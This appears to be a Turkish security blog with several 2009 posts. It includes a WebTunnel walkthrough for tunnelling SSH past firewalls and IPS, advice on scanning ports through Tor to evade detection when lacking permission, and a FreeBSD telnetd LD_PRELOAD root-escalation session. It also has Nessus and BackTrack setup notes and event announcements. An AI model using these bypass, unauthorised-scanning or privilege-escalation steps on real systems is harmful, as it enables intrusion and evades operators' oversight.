[Etkinlik] Bilgisayar Muhendisligi Ögrencileri Kongresi (BİLMÖK)

28 Subat Cumartesi günü(aynı zamanda dogum günüm) Ankara ODTU’de yapılacak olan Bilgisayar Muhendisligi Ögrencileri Kongresi (BİLMÖK)’te olacagım. Gelecegin parlak bilisim uzmanlarının toplandıgı bu etkinlikte Güvenlik konulu bir sunumum olacak.

Cok fazla teknik detaya dalmadan güvenlik dünyasında neler oluyor, onumuzdeki yıllarda neler olacak, bilgisayar mühendisliğinden mezun olduktan sonra bu sektore girmek isteyenler icin ne gibi avantaj/dezavantajlar var vs gibi konular etrafinda gecen senekinden daha hos bir oturum olacagini dusunuyorum.

Oturum oncesi ve sonrasi Istanbul ucagina(21:00) kadar bayagi zamanim olacak. Ankara’da olup da gorusemedigim arkadaslarla bulusup gorusmek isterim.

Bilmök Nedir?

Bilgisayar Mühendisliği Öğrencileri Kongresi (BİLMÖK), beş yıldır devam eden ve ülkemizin dört bir yanından bilgisayar mühendisliği öğrencilerinin bir araya gelip, çeşitli oturumlara ve etkinliklere katıldığı bir organizasyondur. Mesleğe ilgili ve üniversitelerinde bu alandaki örgütlenme ve organizasyon konusunda aktif faaliyet gösteren, gelişmeleri yakından takip ederek sadece bir “yazılım işçisi”nden çok, fikir üreten ve çözüm sunan katılımcıların çalışmalarıyla ve geleceğe dair önemli adımların atıldığı, fikir-bilgi paylaşımlarının yapıldığı internet ortamında tartışma forumları ile hayata geçirilir. Bunun yanında, ilerde meslektaş olacak gençlerin bir araya gelmelerini sağlayarak sosyal bir altyapı da hazırlar.

Bilmök organizasyon yapısı ve çalışmaları bir yönetmelik ile belirlenmiş olup, yürütme kurulunun önerileriyle, ev sahibi üniversitenin organizasyon komitesi tarafından hayata geçirilir. Yürütme kurulu, kongre esnasında resmi katılımcılar tarafından seçilir.

Detay bilgi ve programın tamamı icin http://www.bilmok.org.tr

Alternatif TCP Tunelleme Araci – WebTunnel

Sitenin takipcileri bilirler TCP/IP iletisiminde tunelleme yontemleri ozel ilgi alanima girer. Bugune kadar cesitli ortamlarda onlarca yontem/arac kullanarak tunelleme yaptim. Ve rahatlikla soyleyebilirim ki en iyi Firewall, en iyi IPS vs sistemini de kullansaniz bir sekilde onarl bypass edilebilir.

Tunelleme yontemlerinden sık kullanilanlarini sayacak olursak;

ICMP Tunelleme -Artik disariya icmp paketleri kapali oldugu icin cok ise yaramiyor DNS Port tunelleme – Disariya dns portu aciksa UDP/TCP 53 uzerinden tunelleme. Ayni zamanda OpenVPN icin de kullanilabilir.

DNS Protokol Tunelleme – Klasik dns sorgulari kullanarak yerel agdaki dns sunucu uzerinden Firewall/IPS Atlatma

HTTP In Smtp tunelleme – HTTP isteklerini local mail sunucu uzerinden gondderme. Bu yontem de sadece local erisimi olanlar icin saglam bir bypass yontemi

Son olarak da

HTTP/HTTPS Tunelleme - Cesitli varyasyonlari olmakla birlikte IPS’ler tarafindan yakalanmamak icin HTTP Degil HTTPS kullanmak ve klasik http protokolune uygun istekler gondermek gerekir. Yani disarda biryerde 80. portu acik bekleyen bir sunucu ve uzerinde kendi yazilimimiz olmasina gerek olmadan calisan web sunucu uzerine bir dosya yerlestirerek bu dosya araciligi ile tunelleme yapmak.

Bu yontemle calisan araclar cogunlukla TCP baglantilarini tunelleme icin kullaniliyor. UDP icin henuz saglikli calisan uygulama sayisi oldukca az/yok.

Tunelleme konusu gelince seminerlerimden birinde katilimci bir arkadasin soyledigi su soz aklima geliyor “Bir port acikca tum portlar aciktir, bir protokol aciksa tum protokoller aciktir”.

Bu yazinin konusunu da yeni cikan bir tunelleme araci olusturuyor. WebTunnel, tamamen http/https istekleri uzerinden calisan ve herhangi TCP protokolunu ilgili sayfa uzerinden tunellemeye yarayan bir arac. Buna benzer bir araci yakinlarda yayinlanmisti ama jsp versiyonu haric saglikli calismiyordu(reDuh)

WEbTunnel Calisma mantigi

Istemci—-Proxy/Firewall/IPS—-Internet

Istemci’nin sadece Proxy uzerinden HTTP ve HTTPS isteklerine izni var. Fakat istemci SSH ya da RDP gibi protokoller kullanmak istiyor.

Istemci Webtunnel’in bilesenlerinden birini disarda bir sunucuya yerlestiriyor. Bu bilesen perl ile yazilmis bir CGI uygulamasi. (Calismasi icin hedef sunucuda .pl uzantili dosyalarin cgi olarak calistirma izni olmasi gerekir.)

Sonrasinda istemci tarafinda WebTunnel’in istemci yazilimi ile sunucudaki bu  URL’i cagiriyor ve tunnel kurulmus oluyor. Bundan sonrasi kullanilacak diger uygulamalarin portunun tunelin actigi porta yonlendirilmesine kaliyor.

Uygulama

http://www.islandjohn.com/islandjohn.com/Home/Entries/2009/2/1_Webtunnel.html

adresinden webtunnel uygulamasi indirilir. Uygulamanin wts.pl  —>Sunucuya aktarilacak kisim wtc.pl —->istemcide kullanilacak kisim

olmak uzere iki bileseni vardir.  “wts.pl” web sunucuda cgi-bin dizinine yerlestirilir. Sonrasinda tunel kurulumu icin wtc.pl scripti calistirilmali.

#perl wtc.pl 

Usage: wtc.pl [--daemon] [--pid file] [--cert file] [--key file] local remote tunnel [proxy]

local        Tunel kurulduktan sonra yerelde dinlemeye alinacak port(Tunelleme yapilacak diger uygulamalar bu portu kullanacak)

remote        Baglanilmak istenen asil sistem

tunnel        Tunel ucu olarak kullanilacak wts.pl scriptinin http/https yolu

proxy         Uygulamayi Proxy uzerinden kullanmak icin Proxy adresi

Tunel’i aktif etmek icin kullandigim komut:

$ perl wtc.pl tcp://localhost:8080 tcp://vpn.lifeoverip.net:22 http://WEB_SUNUCU/cgi-bin/wts.pl

2009-02-23 10:42:57 webtunnel[9512]: wtc_tunnel_start() code=200 message=OK status=1 reason=Tunnel started C

2009-02-23 10:43:38 webtunnel[9512]: wtc_tunnel_stop() code=200 message=OK status=1 reason=Tunnel stopped

Bu komutla localhost’un 8080 portunu uzaktaki wts.pl araciligi ile vpn.lifeoverip.net’in 22. portuna baglamis olduk. Kurulan tuneli kullanarak SSH baglantisi yapalim

huzeyfe@elmasekeri:~$ ssh localhost  -p 8080

The authenticity of host ‘[localhost]:8080 ([127.0.0.1]:8080)’ can’t be established. DSA key fingerprint is c2:c3:a8:6c:0b:ce:7c:59:7d:e3:38:6c:98:67:4a:46. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added ‘[localhost]:8080′ (DSA) to the list of known hosts. Password: Last login: Sun Feb 22 19:23:16 2009 from XYZ Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994 The Regents of the University of California.  All rights reserved.

$ last|head -1 huzeyfe          ttyp0    WEB_SUNUCU          Mon Feb 23 10:33   still logged in $

Gorulecegi gibi vpn.lifeoverip.net’e istemcinin ip adresinden degil web sunucunun ip adresinden baglanilmis oluyor.

Tunel Guvenligi

Tunel kurulurken bir sniffer araciligi ile gidip gelen veriler incelenirse asagidaki gibi cikti alinacaktir

root@elmasekeri:~# urlsnarf

urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]

123.alibaba. – - [23/Feb/2009:10:56:06 +0200] “GET http://WEB_SUNUCU/cgi-bin/wts.pl?cmd=start&arg=tcp%3A%2F%2Fvpn.lifeoverip.net%3A22 HTTP/1.1″ – - “-” “webtunnel/0.0.3″

123.alibaba. – - [23/Feb/2009:10:56:07 +0200] “GET http://WEB_SUNUCU/cgi-bin/wts.pl?cmd=read HTTP/1.1″ – - “-” “webtunnel/0.0.3″

123.alibaba. – - [23/Feb/2009:10:56:07 +0200] “POST http://WEB_SUNUCU/cgi-bin/wts.pl?cmd=write HTTP/1.1″ – - “-” “webtunnel/0.0.3″

123.alibaba. – - [23/Feb/2009:10:56:07 +0200] “GET http://WEB_SUNUCU/cgi-bin/wts.pl?cmd=read HTTP/1.1″ – - “-” “webtunnel/0.0.3″

123.alibaba. – - [23/Feb/2009:10:56:07 +0200] “GET http://WEB_SUNUCU/cgi-bin/wts.pl?cmd=read HTTP/1.1″ – - “-” “webtunnel/0.0.3″

123.alibaba. – - [23/Feb/2009:10:56:07 +0200] “POST http://WEB_SUNUCU/cgi-bin/wts.pl?cmd=write HTTP/1.1″ – - “-” “webtunnel/0.0.3″

123.alibaba. – - [23/Feb/2009:10:56:08 +0200] “GET http://WEB_SUNUCU/cgi-bin/wts.pl?cmd=read HTTP/1.1″ – - “-” “webtunnel/0.0.3″

…
POST detaylarina bakilirsa arada gidip gelen veriler(sifreler vs)okunabilir. Dolayisi ile tuneli guvenli kurabilmek icin https baglantisi kullanilmalidir.

$ perl wtc.pl tcp://localhost:8080 tcp://vpn.lifeoverip.net:22 https://WEB_SUNUCU/cgi-bin/wts.pl

gibi

ya da istemci tarafi sertifikalari kullanilarak daha guvenli bir baglanti kurulabilir.

Backtrack 4′e Nessus Kurulumu

Kisitlayici lisans politikalarindan dolayi* Nessus paketleri BackTrack ile birlikte gelmiyor. Nessus’suz bir Backtrack’de tuzsuz corba gibi olacagindan Backtrack kurulduktan sonra ilk isim Nessus’u kurmak oluyor.

Eski surum Backtrack’lerde Nessus.org dan indirdigimiz rpmleri kullanarak kurulum yapiyorduk fakat Backtrack 4 ile birlikte  bu tip sorunlar(paket yukleme guncelleme zorluklari) tarihe karisti.Tek bir komutla artik Nessus kurulabilir.

Nessus Kurulumu

Nessus’un kurulumu icin gerekli bazi ek paketler vardir. Oncelikle bunlarin kurulmasi gerekir.

Nessus.org adresinden ilgili paketler indirilir(Ben Ubuntu paketlerini kullanmayi tercih ettim)

# dpkg –install Nessus-3.2.1-ubuntu804_i386.deb

Selecting previously deselected package nessus.
(Reading database … 128519 files and directories currently installed.)
Unpacking nessus (from Nessus-3.2.1-ubuntu804_i386.deb) …
Setting up nessus (3.2.1) …
nessusd (Nessus) 3.2.1. for Linux
(C) 1998 – 2008 Tenable Network Security, Inc.

Processing the Nessus plugins…
[##################################################]

All plugins loaded

- Please run /opt/nessus/sbin/nessus-adduser to add an admin user
- Register your Nessus scanner at http://www.nessus.org/register/ to obtain
all the newest plugins
- You can start nessusd by typing /etc/init.d/nessusd start

Processing triggers for libc6 …
ldconfig deferred processing now taking plac

Nessus Istemci Kurulumu

Nessus istemcisinin indirilecegi adres http://downloads.nessus.org/nessus3dl.php?file=NessusClient-3.2.1.1-ubuntu804.i386.deb&licence_accept=yes&t=a219f47d370dc8dd00b2eb0f19fe832a

Nessus kurulurken baska paketlere olan bagimliligi yuzunden asagidaki gibi hata verebilir.

# dpkg –install NessusClient-3.2.1.1-ubuntu804.i386.deb

Selecting previously deselected package nessusclient.
(Reading database … 149403 files and directories currently installed.)
Unpacking nessusclient (from NessusClient-3.2.1.1-ubuntu804.i386.deb) …
dpkg: dependency problems prevent configuration of nessusclient:
nessusclient depends on libqt4-core; however:
Package libqt4-core is not installed.
nessusclient depends on libqt4-gui; however:
Package libqt4-gui is not installed.
dpkg: error processing nessusclient (–install):
dependency problems – leaving unconfigured
Errors were encountered while processing:
nessusclient

Hatayi asip kuruluma devam etmek icin asagıdaki bagimliliklarin kurulmasi gerekir.

#apt-get install libqt4-core libqt4-gui libqtcore4 libqt4-network libqt4-script libqt4-xml libqt4-dbus libqt4-test libqtgui4 libqt4-svg libqt4-opengl libqt4-designer libqt4-assistant

Ardından tekrar istemci programı kurmak icin aynı komut tekrarlanır.

# dpkg –install NessusClient-3.2.1.1-ubuntu804.i386.deb

(Reading database … 149566 files and directories currently installed.) Preparing to replace nessusclient 3.2.1.1 (using NessusClient-3.2.1.1-ubuntu804.i386.deb) … Unpacking replacement nessusclient … Setting up nessusclient (3.2.1.1) …

Kurulum sonrasi islemler

Aktivasyon Kodu Alımı

Nessus pluginleri alabilmek ve kullanmak icin aktivasyona ihtiacimiz var. http://nessus.org/plugins/index.php adresinden bir adet e-posta adresi belirterek aktivasyon kodu alınabilir

Kısa sürede e-posta adresinize ilgili aktivasyon kodu ve nasıl yükleneceği bilgisi gelecektir.

#/opt/nessus/bin/nessus-fetch –register A858-4653-9614-…

Your activation code has been registered properly – thank you.

Now fetching the newest plugin set from plugins.nessus.org…

Your Nessus installation is now up-to-date. If auto_update is set to ‘yes’ in nessusd.conf, Nessus will update the plugins by itself.

Kullanıcı Ekleme

# /opt/nessus/sbin/nessus-add-first-user

Using /var/tmp as a temporary file holder

Add a new nessusd user ———————-

Login : honal

Authentication (pass/cert) [pass] : Login password : Login password (again) :

User rules ———- nessusd has a rules system which allows you to restrict the hosts that honal has the right to test. For instance, you may want him to be able to scan his own host only.

Please see the nessus-adduser(8) man page for the rules syntax

Enter the rules for this user, and hit ctrl-D once you are done : (the user can have an empty rules set)

Login : honal Password : *********** DN : Rules :

Is that ok ? (y/n) [y] y user added. Thank you. You can now start Nessus by typing : /opt/nessus//sbin/nessusd -D

Nessus’u baslatmak için

#/etc/init.d/nessusd start ya da

#/opt/nessus/sbin/nessusd -D -q

komutları kullanılabilir.

Nessus’u başlattıktan sonra NessusClient’i calistirarak kullanıma baslayabilirsiniz.

/opt/nessus/bin/NessusClient

*Malesef ki cogu profesyonel Nessus kullanicisi yeni lisanslama modelinden haberdar degil ve Nessus’u illegal olarak kullaniyor. Eger Nessus’u ticari amacli kullaniyorsanuz mutlaka lisans almaniz gerekir(A ‘HomeFeed’ is available for free to home users, but can not be used professionally.) onun haricinde home user kategorisine giriyorsaniz lisans almaniza gerek yok.

Nessus.org adresinde konu ile ilgili aciklamalar su sekilde. Note that You are not eligible to subscribe to the HomeFeed Subscription if You are a corporation, a governmental entity or any other form of organization. You may not subscribe to the HomeFeed Subscription to use the Plugins on a computer owned by your employer or otherwise use the Plugins for the benefit of or to perform any services for any corporation, governmental entity or any other form of organization. If you intend to use the Plugin Feed commercially, you need to obtain a ProfessionalFeed

http://nessus.org/plugins/?view=register-info Adresinden lisanslama ile ilgili detay bilgi alınabilir.

Backtrack 4 ve Ubuntu

2009 Shmoo konferansinda sunulan ve ardindan betasi yayinlanan Backtrack Security Live CD’nin onceki surumlerle en belirgin farki isletim sisteminin Slax’dan Debian’a gecilmis olmasi. Dagitim cikmadan birkac hafta oncesinde egitimlerde kullanmak uzere yeni bir dagitim arasiyina girmistim. Arayislarim sonucu isimi tam goren bir dagitim bulamadigim icin Ubuntu’yu deneyip katilimcilara Vmware imaji olarak vermeyi kararlastirdim. Boylece hem Backtrack’teki bulunan tum ozellikleri yeni dagitima aktaracaktim hem de Backtrack’in yeni paket ekleme, guncelleme gibi sorunlari ile ugrasmayacaktim.

Derken Backtrack 4 beta yayınlandı ve sanki arkadaslarin beni duymus gibi dagitimin temelini Slax’dan Debian’a aktardiklarini gordum ve aklin yolu birdir gercegini bir kez daha yasadim. Boylece belki bir ayi alacak bir ugrastan kurtulmus oldum. Kurtulmus olmasina kurtuldum ama denemek icin masaustune kurdugum Ubuntu’dan da cok hoslandim. Yaklasik 9 yildir Linux kullaniyorum ama Linux tarafinda RedHat’ten hic vazgecmedim. Ubuntu benim icin bir ilk oldu ve boyle giderse de kalici olacak. Masaustunde Ubuntu’yu kurmusken tekrar Backtrack’i sistemime kurup ughrasmak istemedim ama Backtrack ile birlikte gelen paketleri de sistemime kurmak istiyordum.

Backtrack ile birlikte gelen paketler cogu farkli depolarda olmak uzere Ubuntu icin de bulunabilirdi fakat bu cog ugras gerektiren bir is. Ben de Backtrack’in source.list dosyasina bakarak ilgili paketkleri hangi depodan aldigini gorendim ve kendi sistemime o depoyu ekledim.

Backtrack 4 paketlerinin bulundugu depoyu kendi sistemimize eklemek icin asagidaki komutlari vermemiz yeterli.

#wget -q http://repo.offensive-security.com/dist/bt4/binary/public-key -O- | sudo apt-key add –

#echo “deb http://repo.offensive-security.com/dist/bt4 binary/” >> /etc/apt/sources.list

#sudo apt-get update

Bundan sonra ister apt-get install komutu ile ister Synaptic ile Backtrack deposundaki paketler kullanılabilir.

TOR Networku Uzerinden Port Tarama

Port taramalari guvenlik testlerinin en onemli bolumlerindendir. Eger hedef sistemi tarama izniniz yoksa ve taramaniz gerekiyorsa bunu Firewall ve IDS/IPS sistemlerine yakalanmadan yapmaniz gerekir. IDS/IPS atlatarak port taramanin cesitli yontemleri var(bkz. Network Pentest Egitimi*)fakat en kolay ve ise yarar yontemlerden birisi Acik Proxyler uzerinden port tarama.

Tor gibi herkese acik ve guvenilir(!) aglar kullanicilarin gercek ip adreslerini gizleyerek ulastiklari sistemlerde daha az iz birakmalarini saglar. Her bir baglanti farkli bir cikis noktasindan hedefe ulasacagi icin arka plandaki kullanicinin gercek bilgileri gozukmez.

Port tarama icin bu konudaki en yetkin program olan Nmap’i kullandigimiz dusunulurse Nmap’in guncel surumlerinde bu tip taramalari yapabilecegimiz proxy ozelligi yok. Yani Nmap port taramalarini herhangi bir proxy uzerinden geciremez. Ileriki surumlerde bu ozelligin eklenecegini dusunuyorum.

Simdilik isimizi Linux uzerinde proxy destegi olmayan uygulamalari Proxy uzerinden kullanilabilmesiin saglayan Tsocks ile halledelim.(Benzeri isi yapan farkli uygulamarda mevcut, bunlardan birisi de Proxychains uygulamasidir)

Tsocks, uygulamayi calistiracak kullanicinin LD_PRELOAD degiskenini tsocks uygulamasi olarak degistirerek uygulamayi transparan olarak proxy ozelligi ekleyen bir wrapper uygulamasi.

TSOCKS(1)

NAME tsocks – Shell wrapper to simplify the use of the tsocks(8) library to transparently allow an application to use a SOCKS proxy

root@elmasekeri:~# env|grep -i LD LD_PRELOAD=/usr/lib/libtsocks.so

Proxy uzerinden hangi tur port taramalar mumkundur. Read more »

IDC IT Security Roadshow 2009

Geleneksel hale gelmiş güvenlik etkinliklerinden IDC IT Security Roadshow 17 Şubat’da Istanbul Swiss Otlede yapılacak.

Ben de son dakika aksiliği çıkmazsa orada olacağım. Gelebilecek arkadaşlarla görüşmek isterim.

BT Güvenlik Seminer Serisi 2009’da ele alınacak konular;

• Evrim veya uç nokta Güvenliği
• İstilacı bilgisayar kullanımı ve çok hızlı cihaz çoğalmasına karşı güvenlik bakımından hazırlıklı bulunma
• Kurumsal veri kaybı ve bilgi tabanlı işletmelere yönelttiği tehditler
• Web 2.0 çağında mesajlaşma güvenliği
• Suç 2.0 tehlikesi ve diğer gelişen tehditler
• Uygunluk ve BT Güvenliği bakımından anlamı
• Yönetilen ve barındırılan güvenlik hizmetlerinin ortaya çıkışı
• Güvenlik sistemleri, depolama ve ağ yönetiminin birbirine yaklaşması

Detay bilgi ve kayıt için: http://www.idc-cema.com/?showproduct=34676&content_lang=TR

FreeBSD Telnet Daemon Zero Day Açıklığı

full-disclosure genelde çok dikkate aldığım bir liste değildir fakat ara ara sıkı şeyler çıkıyor. Dün de benzeri bir durum oldu. Arkadaşın biri FreeBSD telnet daemonu ile ilgili bir zero day açıklığı bulduğunu ve bunun hem local hem de yari-remote çalışabileceğini söylüyordu. Önce pek inandırıcı gelmedi ama sonra kendi sistemlerimde test edince gerçekten çalıştığını gördüm.

Açıklık local privilege escalation tipinde ve FreeBSD telnet daemounun /bin/login’i çalıştırırken environment değişkenini kontrolden geçirmemesinden kaynaklanıyor. Telnet bağlantılarında istenilirse Telnet sunucuya kendi çevresel değişkenleri gönderilebilir. Bu açıklık da benzeri yöntemi kullanarak LD_PRELOAD değişkenini set ederek(daha önce hedef sisteme ilgili dosyayı atmış olması gerekir) gönderiyor ve telnet sunucusu gelen bu değişkeni kontrol etmediğinden /bin/login’i root hakları ile çalıştırırken ilgili dosyayı da çalıştırıyor ve sonrası bingo!

Açıklığı değerlendirebilmek için hedef sistemde siradan bir kullanici hesabinin olmasi gerekir. Bu kullanıcının yetkilerini kullanarak hedef sisteme telnet yapılır ve LD_PRELOAD değişkeni bizim istediğimiz şekilde gönderilir. Sonrasında ilgili sistemde root hakları ile komut çalıştırmak mümkün olacaktır.

Açıklığın Testi:

Öncelikle ilgili dosyanın derlenerek hedef sisteme aktarılması gerekir. /tmp dizinine aktardığımızı düşünelim.Sonra ister hedef sisteme bağlanarak isterse uzaktan telnet bağlantısı kurularak ilgili dosyayı çalıştıralım.

FreeBSD 7.0 Telnet Suncusu

#uname -a FreeBSD snort 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386

İstemci(Telnet sunucu ile aynı makine de olabilir.)

[huzeyfe@homelabs ~]$ id uid=1001(huzeyfe) gid=1001(huzeyfe) groups=1001(huzeyfe),0(wheel)

[huzeyfe@homelabs ~]$ uname -a FreeBSD homelabs 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386

[huzeyfe@homelabs ~]$ telnet telnet> auth disable SRA telnet> environ define LD_PRELOAD /tmp/libno_ex.so.1.0 telnet> open 192.168.2.20 Trying 192.168.2.20… Connected to 192.168.2.20. Escape character is ‘^]’.

FreeBSD/i386 (snort) (ttyp3)

ALEX-ALEX # uname -a FreeBSD snort 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 # id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

Her ne kadar FreeBSD sürümlerinde telnet açık olarak gelmese de(inetd.conf’dan açılması gerekir.) bazen zorunluluktan dolayı açılması gerekebiliyor. Bu tip durumlar için kötü bir bug. Read more »

Sosyal Aglarin Tehlikeleri

Oldum olasi sosyal aglardan uzak dururum, bu tip oyuncaklari zaman kaybi olarak gorurum. Ama dunya benim gibi dusunmuyor ve bu tip aglarin milyonlara varan kullanicilari olusmus durumda.

Belki bir on yil sonra bu tip aglarin detaylı arastırmaları yapılarak daha net sonuclar ve saglıklı degerlendirmeler yapılacak ama benim simdiden gorebildigim kadari ile mahremiyet kelimesinin bu tip aglara girenler icin cok da fazla birsey ifade etmedigi(Istisnalari kenara alalim). Bulunduğum şirketlerde hep bu tip ağların çeşitli güvenlik zaafiyetlerine sebep olduğunu ve kapatılması gerekitğini savundum.

SNOsof yaptığı güvenlik testlerinden birinde Facebook’u kullanarak bir şirkete ait kullanıcıların nasıl kandırıldığı ve gizli bilgilerinin alındığı ile ilgili bir çalışma yapmış. Çalışma hem yapılış tarzı hem de sonuçları açısından hem malumu ilan olmuş hem de bu tip ağların kapatılmasına karşı gelen yöneticiler için güzel bir  örnek olay olmuş.

Turkce Guvenlik Blogları Agi(TGBA)

Uzun zamandir aklimda olan birseydi, Turkiye’de güvenlik üzerinde Türkçe yazılan blogları biryerde toplamak. Dusuncemi zaman asimina ugramadan gerceklestirmek istedim. Cevrenizde güvenlik üzerine uğraşan ve bunları blog olarak yazan tanıdıklarınızın adreslerini yorum olarak girebilirseniz  belli bir degerlendirmeden gecirerek bir networkte toplamak istiyorum. Gerci hepimizin RSS okuyucularinda bu tip bloglar vardır ama biliyorum ki cogu eksik. Kucucuk bir camiayiz fakat birbirimizi tanımıyoruz. Bunu dun Adli Bilisim Konferansinda bir kez daha gordum.

Onereceginiz/gondereceğiniz bloglar en azindan aşağıdaki özellikleri barındırıyor olmalı:

• En az altı aydır blog yazıyor olmak
• Blog konuları güvenlikle ilgili her alanda olabilir.
• Güvenlik firmalarının blogları olabilir
• Illegal icerik bulundurmamalı(warez vs)
• …

Not-1: Daha once yapilmis ve calisan benzeri calismadan haberdar olanlar varsa  ogrenmek isterim.

Not-2: Henuz baslamadigim icin su soyle olsun seklinde tekliflerinizi yorum olarak bekliyorum. Yarin cok gec olabilir:)

Işletim sistemlerinde güvenlik tartışması

Bu yazı günümüzde yaygın kullanılan işletim sistemlerinin güvenlik yönünden yorumsal karşılaştırmasını içermektedir. Tartışmaya daha çok açık kod, kapalı kod, yazılım yönünden bakılmıştır.

 Not: Bu yazı bugüne kadar çeşitli amaçlarla kullandığım işletim sistemleri üzerinde edindiğim tecrübelerin sonucudur ve kesin doğruluk içermez.

 Cevap aradığımız sorulardan bazıları;

 • Bir işletim sisteminin güvenliğini hangi unsurlar belirler?

• Güvenlik düzey belirlemesi için standart var mı?

• Açık kodlu olmak bir sistemi daha güvenli kılar mı?

• Bir sistemin daha yaygın olması daha fazla açıklık aranmasına sebep olur mur? Read more »